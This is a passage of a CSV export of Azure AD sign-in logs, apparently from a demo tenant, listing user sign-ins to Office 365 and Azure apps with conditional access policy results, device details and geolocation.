'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",68d708e5-0f59-4f58-b7ee-efd210ae1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,68d708e5-0f59-4f58-b7ee-efd210ae1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1741,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bba45a61-81dc-4dfa-8d6b-758fdce46770,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8ad00b2e-7523-45f8-a6db-5c47f3f71200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8ad00b2e-7523-45f8-a6db-5c47f3f71200,SigninLogs,Sucess,33.7984581,-84.38828278
+1742,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bba45a61-81dc-4dfa-8d6b-758fdce46770,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8ad00b2e-7523-45f8-a6db-5c47f3f71200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8ad00b2e-7523-45f8-a6db-5c47f3f71200,SigninLogs,Sucess,33.7984581,-84.38828278
+1743,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:01.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68be5932-6ac6-4ba9-a076-e61146a731dc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-0593dd621200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,80d584c4-dd35-4dcb-882c-0593dd621200,SigninLogs,Sucess,33.7984581,-84.38828278
+1744,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:02.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",20e62dc1-35c9-4a85-9bad-dd132f076c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,20e62dc1-35c9-4a85-9bad-dd132f076c00,SigninLogs,Sucess,40.75891113,-73.97901917
+1745,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:01.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68be5932-6ac6-4ba9-a076-e61146a731dc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-0593dd621200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,80d584c4-dd35-4dcb-882c-0593dd621200,SigninLogs,Sucess,33.7984581,-84.38828278
+1746,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:18.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ecd1b75-f60c-4dbd-83e9-4c0f62e89750,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-0593fb6c1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,80d584c4-dd35-4dcb-882c-0593fb6c1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1747,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:23.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,62ff5385-f49c-4b32-bda3-a95b87d83fc6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",818ddda4-c0b9-4b32-b709-e11794461300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,818ddda4-c0b9-4b32-b709-e11794461300,SigninLogs,Sucess,36.6404686,-78.26995087
+1748,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8fe3b24-efaa-446f-b060-b6e6ef6073ff,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 